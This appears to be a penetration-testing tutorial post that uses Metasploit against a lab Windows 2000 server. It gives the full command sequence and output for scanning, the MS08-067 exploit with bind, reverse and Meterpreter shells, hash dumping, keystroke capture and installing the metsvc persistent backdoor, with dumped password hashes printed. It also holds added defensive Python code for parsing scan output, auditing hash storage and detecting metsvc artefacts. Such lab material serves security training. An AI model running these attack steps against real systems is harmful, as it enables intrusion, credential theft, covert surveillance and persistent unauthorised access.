Learning Metasploit by Example
This article covers port scanning, OS detection, vulnerability detection, exploitation and opening a backdoor with Metasploit.
Reference: BackTrack 4: Assuring Security by Penetration Testing
I won't say much about Metasploit itself; a Baidu search turns up plenty of introductions.
The vulnerability demonstrated is MS08-067, which is fairly old, and the target system is old too: Windows 2000 Advanced Server. The main purpose of this article is to introduce the use of Metasploit, and MS08-067 is an example that succeeds easily, which is why it was chosen.
################### Lab environment ####################
Target host:
OS: Windows 2000 Advanced Server
IP: 192.168.200.140
Attacker host:
OS: BT5 R1
IP: 192.168.200.148
################## Preparation before the intrusion: port scan and vulnerability check ##################
Since the db_nmap command is needed, first check the current database connection status.
msf > db_status
postgresql connected to msf3
Good: we can see that we are already connected to the postgresql database.
msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.200.140
Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-12-27 01:06 EST
Nmap: Nmap scan report for 192.168.200.140
Nmap: Host is up (0.0023s latency).
Nmap: Not shown: 970 closed ports
Nmap: PORT STATE SERVICE VERSION
Nmap: 25/tcp open smtp Microsoft ESMTP 5.0.2195.6713
Nmap: 42/tcp open wins Microsoft Windows Wins
Nmap: 53/tcp open domain Microsoft DNS
Nmap: 80/tcp open http Microsoft IIS httpd 5.0
Nmap: 88/tcp open kerberos-sec Microsoft Windows kerberos-sec
Nmap: 119/tcp open nntp Microsoft NNTP Service 5.0.2195.6702 (posting ok)
Nmap: 135/tcp open msrpc Microsoft Windows RPC
Nmap: 139/tcp open netbios-ssn
Nmap: 389/tcp open ldap
Nmap: 443/tcp open https?
Nmap: 445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
Nmap: 464/tcp open kpasswd5?
Nmap: 563/tcp open snews?
Nmap: 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Nmap: 636/tcp open tcpwrapped
Nmap: 1026/tcp open msrpc Microsoft Windows RPC
Nmap: 1029/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Nmap: 1036/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
Nmap: 1042/tcp open msrpc Microsoft Windows RPC
Nmap: 1044/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
Nmap: 1045/tcp open msrpc Microsoft Windows RPC
Nmap: 1051/tcp open msrpc Microsoft Windows RPC
Nmap: 1054/tcp open msrpc Microsoft Windows RPC
Nmap: 1061/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
Nmap: 1062/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
Nmap: 1122/tcp open msrpc Microsoft Windows RPC
Nmap: 3268/tcp open ldap
Nmap: 3269/tcp open tcpwrapped
Nmap: 3372/tcp open msdtc Microsoft Distributed Transaction Coordinator (error)
Nmap: 3389/tcp open microsoft-rdp Microsoft Terminal Service
Nmap: MAC Address: 00:0C:29:EA:2C:5D (VMware)
Nmap: Device type: general purpose
Nmap: Running: Microsoft Windows 2000|XP|Me
Nmap: OS details: Microsoft Windows 2000 SP0/SP2/SP4 or Windows XP SP0/SP1, Microsoft Windows 2000 SP1, Microsoft Windows 2000 SP2, Microsoft Windows Millennium Edition (Me)
Nmap: Network Distance: 1 hop
Nmap: Service Info: Host: 2000adsrven.combatlab.com; OS: Windows
Nmap: Host script results:
Nmap: | smb-check-vulns:
Nmap: | MS08-067: VULNERABLE
Nmap: | Conficker: Likely CLEAN
Nmap: | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
Nmap: | SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
Nmap: | MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap: |_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap: Nmap done: 1 IP address (1 host up) scanned in 52.73 seconds
With db_nmap we can see the operating system of 192.168.200.140 and the vulnerabilities it is likely to have, among them MS08-067, the one used in this exercise.
######################### Starting the intrusion ###########################
Search for the MS08_067 module and view its information
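Reading a db_nmap report by eye works for one host, but a defender triaging many scans wants the script results and open ports pulled out automatically, and wants to know which checks never ran. The following parser is an added example (not part of the original post or of Metasploit); its input is a constructed, trimmed copy of the db_nmap output above.

```python
import re

# Constructed sample: a trimmed copy of the db_nmap console output shown above.
SAMPLE = """\
Nmap: Nmap scan report for 192.168.200.140
Nmap: PORT STATE SERVICE VERSION
Nmap: 135/tcp open msrpc Microsoft Windows RPC
Nmap: 139/tcp open netbios-ssn
Nmap: 445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
Nmap: 3389/tcp open microsoft-rdp Microsoft Terminal Service
Nmap: OS details: Microsoft Windows 2000 SP0/SP2/SP4 or Windows XP SP0/SP1
Nmap: Host script results:
Nmap: | smb-check-vulns:
Nmap: | MS08-067: VULNERABLE
Nmap: | Conficker: Likely CLEAN
Nmap: | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
Nmap: |_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
CHECK_RE = re.compile(r"^\|_?\s+([^:]+):\s+(.*)$")

def parse_db_nmap(text):
    """Parse db_nmap console lines into host, OS guess, open ports and script checks."""
    report = {"host": None, "os": None, "ports": [], "checks": {}}
    in_script = False
    for raw in text.splitlines():
        line = (raw[6:] if raw.startswith("Nmap: ") else raw).strip()  # drop console prefix
        if line.startswith("Nmap scan report for "):
            report["host"] = line.split()[-1]
        elif line.startswith("OS details: "):
            report["os"] = line[len("OS details: "):]
        elif line.startswith("| smb-check-vulns:"):
            in_script = True            # the NSE result block starts here
        elif in_script and line.startswith("|"):
            m = CHECK_RE.match(line)
            if m:
                report["checks"][m.group(1)] = m.group(2)
            if line.startswith("|_"):   # "|_" marks the last line of the block
                in_script = False
        else:
            m = PORT_RE.match(line)
            if m:
                report["ports"].append((int(m.group(1)), m.group(3), m.group(4), m.group(5) or ""))
    return report

def vulnerable_checks(report):
    """Checks that came back VULNERABLE: these are the patches to apply first."""
    return sorted(n for n, s in report["checks"].items() if s.startswith("VULNERABLE"))

def disabled_checks(report):
    """Checks that never ran: the host is not 'clean' for these until they are re-run."""
    return sorted(n for n, s in report["checks"].items() if s.startswith("CHECK DISABLED"))
```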
msf > search ms08_067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > info
Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 12540
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Provided by:
hdm
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
http://www.osvdb.org/49243
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
NEXPOSE (dcerpc-ms-netapi-netpathcanonicalize-dos)
msf exploit(ms08_067_netapi) >
View the options that need to be configured to attack the target host
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.200.140 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LPORT 4444 yes The listen port
RHOST 192.168.200.140 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Targeting
################ Using a bind shell #######################
Set the relevant parameters
msf exploit(ms08_067_netapi) > set RHOST 192.168.200.140
RHOST => 192.168.200.140
Set the payload
msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
Check the parameters you have set
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.200.140 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LPORT 4444 yes The listen port
RHOST 192.168.200.140 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Targeting
Now launch the overflow attack
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:English
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Command shell session 2 opened (192.168.200.148:34431 -> 192.168.200.140:4444) at 2011-12-27 01:14:59 -0500
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Shell obtained! Haha!!!
########################### Using a reverse shell #####################
As everyone knows, if there is a firewall between the attacker and the target, it tracks TCP connection state and a forward (bind) connection may not succeed. A firewall cannot stop our attack, though, because we still have the reverse connection.
This time we use a reverse shell.
msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set LHOST 192.168.200.148
LHOST => 192.168.200.148
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.200.140 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.200.148 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.200.148:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:English
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Command shell session 3 opened (192.168.200.148:4444 -> 192.168.200.140:2226) at 2011-12-27 01:20:55 -0500
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Again we get a shell, haha.
As you can see, setting up a reverse shell is not complicated: compared with the bind shell, only one extra parameter, the local listen address LHOST, has to be set.
###################### The powerful Meterpreter ##########################
Next up is Meterpreter.
A meterpreter is an advanced, stealthy, multifaceted, and dynamically extensible
payload which operates by injecting reflective DLL into a target memory. Scripts
and plugins can be dynamically loaded at runtime for the purpose of extending
the post-exploitation activity. This includes privilege escalation, dumping system
accounts, keylogging, persistent backdoor service, enabling remote desktop, and
many other extensions. Moreover, the whole communication of the meterpreter shell
is encrypted by default.
I won't translate the English, so as not to embarrass myself. In short, meterpreter is a very powerful tool.
We set the payload to meterpreter
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.200.140 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.200.148 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >
The show options output shows that the parameters to set are no different from the reverse shell (note that RHOST and LHOST keep their earlier values here and were not set again).
But meterpreter is far more capable than a plain shell.
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.200.148:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:English
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.200.140
[*] Meterpreter session 4 opened (192.168.200.148:4444 -> 192.168.200.140:2238) at 2011-12-27 01:29:29 -0500
meterpreter >
Type a question mark to see what we can do
meterpreter > ?
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
meterpreter >
See? Very powerful!
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : 2000ADSRVEN
OS : Windows 2000 (Build 2195, Service Pack 4).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
This gives us the current system information.
meterpreter > hashdump
Administrator:500:01fc5a6be7bc6929aad3b435b51404ee:0cb6948805f797bf2a82807973b89537:::
GuestVD:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d26ef143374b85e088e8fd6cfa23b6c3:::
TsInternetUser?:1000:93d52434d77e49a5254ddde1f8ceea44:0a9fbeb0dcb3920a5a998dc4235b4091:::
IUSR_2000ADSRVEN:4:1001:24efe7c8a2d071151ae80e959ed56390:5f2d4a0bff72b9bff9711c1a19938de7:::
IWAM_2000ADSRVEN:1002:6d64ce9c9d6ebf8252e3494ee397943f:98f07977d5ad5ec292f37d75b8b9a037:::
2000ADSRVEN$:1007:aad3b435b51404eeaad3b435b51404ee:cc4caad1a7288661ac9f70c9207436cc:::
With the hashes in hand we have essentially obtained the usernames and passwords.
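Why a hash dump is as good as the passwords on this host is visible in the dump itself, and an administrator can check the same thing from a backup of the SAM before an attacker does. The audit below is an added example (not from the original post or from Metasploit): it parses pwdump-format lines, here a constructed sample of three lines copied from the output above, and flags the two storage weaknesses that make the hashes trivially crackable: an LM hash being stored at all, and the well-known constants for an empty LM half and an empty NT password.

```python
# Well-known constants: the LM field stored when no LM hash exists (two empty
# 7-character halves), and the NT hash of an empty password.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM = EMPTY_LM_HALF * 2
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

LM_STORED = "LM hash stored (LM hash storage should be disabled)"
SHORT_PW = "second LM half is empty: password is 7 characters or fewer"
BLANK_PW = "blank password"

# Constructed sample: three lines copied from the hashdump output above.
SAMPLE = """\
Administrator:500:01fc5a6be7bc6929aad3b435b51404ee:0cb6948805f797bf2a82807973b89537:::
GuestVD:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
2000ADSRVEN$:1007:aad3b435b51404eeaad3b435b51404ee:cc4caad1a7288661ac9f70c9207436cc:::
"""

def parse_pwdump(text):
    """Parse user:rid:lmhash:nthash::: lines; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        records.append({"user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt})
    return records

def audit(records):
    """Map each account to the password-storage weaknesses visible in its hashes."""
    findings = {}
    for r in records:
        issues = []
        if r["lm"] != EMPTY_LM:
            issues.append(LM_STORED)
            if r["lm"][16:] == EMPTY_LM_HALF:   # LM hashes each 7-char half separately
                issues.append(SHORT_PW)
        if r["nt"] == EMPTY_NT:
            issues.append(BLANK_PW)
        if issues:
            findings[r["user"]] = issues
    return findings
```

On a domain controller like the one above, the NoLMHash policy and a password-length minimum above 7 would have removed both findings for the Administrator account.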
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process] x86
8 System x86 0 NT AUTHORITY\SYSTEM
160 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
184 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINNT\system32\csrss.exe
208 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINNT\system32\winlogon.exe
236 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\services.exe
248 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\lsass.exe
348 termsrv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\System32\termsrv.exe
468 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\svchost.exe
496 SPOOLSV.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\spoolsv.exe
668 msdtc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\msdtc.exe
816 dfssvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\Dfssvc.exe
836 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\svchost.exe
868 ismserv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\System32\ismserv.exe
888 llssrv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\System32\llssrv.exe
936 ntfrs.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\ntfrs.exe
1004 regsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\regsvc.exe
1016 locator.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\locator.exe
1028 mstask.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\MSTask.exe
1100 winmgmt.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\System32\WBEM\WinMgmt.exe
1132 wins.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\System32\wins.exe
1144 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\svchost.exe
1160 dns.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\System32\dns.exe
1180 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\inetsrv\inetinfo.exe
1844 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\System32\svchost.exe
1820 explorer.exe x86 0 COMBATLAB\Administrator C:\WINNT\Explorer.EXE
664 wuauclt.exe x86 0 COMBATLAB\Administrator C:\WINNT\system32\wuauclt.exe
meterpreter > migrate 1820
[*] Migrating to 1820...
[*] Migration completed successfully.
meterpreter > getuid
Server username: COMBATLAB\Administrator
Migration succeeded: by moving into explorer.exe (PID 1820) the session now runs as COMBATLAB\Administrator instead of NT AUTHORITY\SYSTEM.
meterpreter also has a keystroke-logging function.
Use keyscan_start to begin recording keystrokes, keyscan_dump to display what has been captured, and keyscan_stop to turn it off.
meterpreter > keyscan_start
Starting the keystroke sniffer…
meterpreter > keyscan_dump
Dumping captured keystrokes…
Junbao is a nice guy s
meterpreter > keyscan_stop
Stopping the keystroke sniffer…
######################## Setting up a backdoor with Meterpreter ####################
After a successful intrusion, how do we set up a backdoor?
The powerful meterpreter tool provides this capability.
meterpreter > run metsvc -h
OPTIONS:
-A Automatically start a matching multi/handler to connect to the service
-h This help menu
-r Uninstall an existing Meterpreter service (files must be deleted manually)
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\EkQASdimbMldN...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
The backdoor is in place.
######################## Using the backdoor ########################
How is the backdoor used?
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 192.168.200.140
RHOST => 192.168.200.140
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/metsvc_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LPORT 31337 yes The listen port
RHOST 192.168.200.140 no The target address
Exploit target:
Id Name
— —-
0 Wildcard Target
msf exploit(handler) > exploit
[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.200.148:57009 -> 192.168.200.140:31337) at 2011-12-27 02:02:58 -0500
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
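The metsvc backdoor installed above leaves three loud artefacts that the output itself reveals: a service named metsvc, the files metsrv.dll, metsvc-server.exe and metsvc.exe dropped under a Temp directory, and a listening TCP port (31337 by default) that hands a SYSTEM Meterpreter to anyone who connects. The checker below is an added example (not part of the original post or of Metasploit) that correlates those indicators; it runs on constructed samples of a netstat -ano listing and a service inventory exported as name|pid|path rows, which is an assumed export format rather than any tool's native output.

```python
import re

# Constructed samples (not captured from the lab host): a "netstat -ano"
# listing and a service inventory exported as name|pid|binary-path rows.
NETSTAT = """\
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       8
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       348
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       1532
  TCP    192.168.200.140:31337  192.168.200.148:57009  ESTABLISHED     1532
"""
SERVICES = """\
lanmanserver|8|C:\\WINNT\\system32\\services.exe
TermService|348|C:\\WINNT\\System32\\termsrv.exe
metsvc|1532|C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\EkQASdimbMldN\\metsvc.exe
"""

KNOWN_NAMES = {"metsvc"}                                        # service name run metsvc installs
KNOWN_FILES = {"metsvc.exe", "metsvc-server.exe", "metsrv.dll"}  # files it uploads
TEMP_RE = re.compile(r"\\te?mp\\", re.I)                        # binary living under a Temp dir

def listening_ports(netstat):
    """Return {port: pid} for every TCP socket in LISTENING state."""
    ports = {}
    for line in netstat.splitlines():
        f = line.split()
        if len(f) == 5 and f[0] == "TCP" and f[3] == "LISTENING":
            ports[int(f[1].rsplit(":", 1)[1])] = int(f[4])
    return ports

def parse_services(text):
    """Parse the assumed name|pid|path export into dicts."""
    out = []
    for line in text.splitlines():
        if line.strip():
            name, pid, path = line.split("|", 2)
            out.append({"name": name, "pid": int(pid), "path": path})
    return out

def find_suspicious_services(netstat, services):
    """Flag services matching metsvc indicators, with the ports each one listens on."""
    by_pid = {}
    for port, pid in listening_ports(netstat).items():
        by_pid.setdefault(pid, []).append(port)
    findings = []
    for svc in parse_services(services):
        reasons = []
        if svc["name"].lower() in KNOWN_NAMES:
            reasons.append("known Meterpreter service name")
        if svc["path"].rsplit("\\", 1)[-1].lower() in KNOWN_FILES:
            reasons.append("known metsvc binary name")
        if TEMP_RE.search(svc["path"]):
            reasons.append("service binary runs from a Temp directory")
        if reasons:
            findings.append((svc["name"], sorted(by_pid.get(svc["pid"], [])), reasons))
    return findings
```

The Temp-directory rule is the one that still fires when an intruder renames the service and its files; a legitimate service almost never runs from a user's temporary folder.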
posted in Pentest by pen